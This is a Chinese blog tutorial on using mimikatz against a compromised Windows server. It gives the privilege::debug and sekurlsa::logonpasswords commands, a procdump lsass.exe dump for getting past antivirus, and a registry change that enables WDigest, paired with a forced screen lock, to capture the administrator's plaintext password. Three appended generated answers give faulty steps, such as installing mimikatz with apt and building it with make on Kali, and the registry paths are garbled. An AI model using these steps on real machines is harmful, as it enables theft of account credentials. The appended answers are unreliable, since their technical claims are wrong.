mimikatz的使用

mimikatz是个好东西,它的功能很多,最重要的是能从 lsass.exe进程中获取windows的账号及明文密码——这是以前的事了,微软知道后已经准备了补丁,lsass进程不再保存明文口令。Mimikatz 现在只能读到加密后的密码。

使用方法:

1:远程连接使用

控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行

privilege::debug   提取权限
sekurlsa::logonpasswords   抓取密码

在这里插入图片描述
这里抓到了administrator的账号,密码是null,说明没设密码;当然,最大的可能是没抓到密码。解决方法可以看看注意的第四点

在这里插入图片描述

2:本地使用

如果对方电脑开了防火墙,装了杀毒软件,如360,火绒,nod32之类的话。可能就不能在对方电脑上使用mimikatz
在这里插入图片描述
前面说过,mimikatz是从 lsass.exe进程中获取windows的账号及密码的,
这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用)

然后从 lsass.exe进程里导出一个 包含账号密码信息的lsass.dmp 文件,再把这个dmp文件传回来,最后在自己的环境下运行mimikatz,从 dmp文件里读取信息。

1、安装procdump64.exe

2、从procdump64.exe里导出lsass.dmp

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3、将lsass.dmp传回本地

4、使用本地的mimikatz.exe读取lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

我没有搞成功,就不贴图了

可以参考这几篇文章
http://www.hackdig.com/07/hack-55560.htm
https://www.cnblogs.com/kuaile1314/p/12288476.html

注意:

1、版本问题

文件夹里有两个版本,一个是对应32位系统的,一个是64位系统的。搞混了是抓不到信息的

在这里插入图片描述

2、运行权限

一定要用管理员身份运行

在这里插入图片描述

不然会提示权限不够

在这里插入图片描述

3、抓取范围

因为它是从 lsass.exe进程中获取windows的账号密码,而每次关机重启后,lsass进程中的账号信息都会清空

所以只能抓到上次关机后登录过的账号密码的信息

4、抓不到密码的解决方法

以下操作都在cmd里进行

  1. 开启Wdigest Auth服务
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  1. 强制锁屏
rundll32 user32.dll,LockWorkStation
  1. 等待目标系统管理员重新登录
  2. 截取明文密码
  3. 关闭Wdigest Auth服务
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

但是我在写的时候出错了,说无效项名,也不知道啥原因
百度半天也没解决这个问题,暂时先记下来,等找到解决方案了再写
在这里插入图片描述

mimikatz下载链接

1、百度云盘,提取码是 kcuh
2、csdn

  • 35
    点赞
  • 105
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
### 回答1: 这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到违法行为,请使用时慎重考虑。 ### 回答2: Mimikatz是一款用于提取Windows凭证的工具,它可以用来获取本地Windows用户和域用户的密码、NTLM哈希值和明文密码。本文将介绍如何通过Kali中的Mimikatz工具来实现提取凭证的操作。 1. 安装Mimikatz Mimikatz是Kali自带的工具,在终端中输入以下命令即可安装: ``` apt-get install mimikatz ``` 2. 运行Mimikatz 进入终端,输入以下命令来运行Mimikatz: ``` mimikatz ``` 如果你使用的是64位版本的系统,你还需要输入以下命令: ``` mimikatz # privilege::debug ``` 这个命令会给你的用户添加更多的访问权限,也就是所谓的debug权限。 3. 提取凭证 接下来,你可以通过以下命令来提取凭证: ``` mimikatz # sekurlsa::logonpasswords ``` 这个命令会输出本地计算机上所有用户的明文密码和NTLM哈希值。 如果你想获取域用户的凭证,可以使用以下命令: ``` mimikatz # sekurlsa::logonpasswords full ``` 这个命令会输出域控制器上所有域用户的明文密码和NTLM哈希值。 4. 清除日志和关闭Mimikatz 运行Mimikatz时默认会生成一些日志文件。如果你不希望这些日志留在计算机上,可以使用以下命令来清除日志: ``` mimikatz # log::clear ``` 最后,输入以下命令来关闭Mimikatz: ``` mimikatz # exit ``` 以上就是通过Kali中的Mimikatz工具来实现提取凭证的操作的详细教程。需要注意的是,Mimikatz是一款非常强大的工具,使用时请谨慎,避免造成不必要的损失。 ### 回答3: Kali是一个开源免费的渗透测试操作系统,而mimikatz是一个密码破解工具,常被黑客用于窃取用户密码,因此Kali与mimikatz结合使用可以进行密码破解和渗透测试。 首先,在Kali中下载安装mimikatz。打开终端,输入以下命令: git clone https://github.com/gentilkiwi/mimikatz.git 然后,进入mimikatz文件夹,编译mimikatz工具: cd mimikatz make 编译完成后,输入以下命令即可使用mimikatz: ./mimikatz 接下来,使用privilege模块提升权限: privilege::debug 然后,使用sekurlsa模块获取系统的登录凭据: sekurlsa::logonpasswords 最后,我们可以通过导出文件的方式保存密码信息,输入以下命令: sekurlsa::logonpasswords full log sekurlsa.log 这样就完成了在Kali中使用mimikatz的教程。需要注意的是,这种密码破解和窃取方法是非法的,只能在授权的渗透测试环境中使用。在实际的工作中,我们要始终遵循合法合规的原则,做好安全防护和风险评估工作,确保系统和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值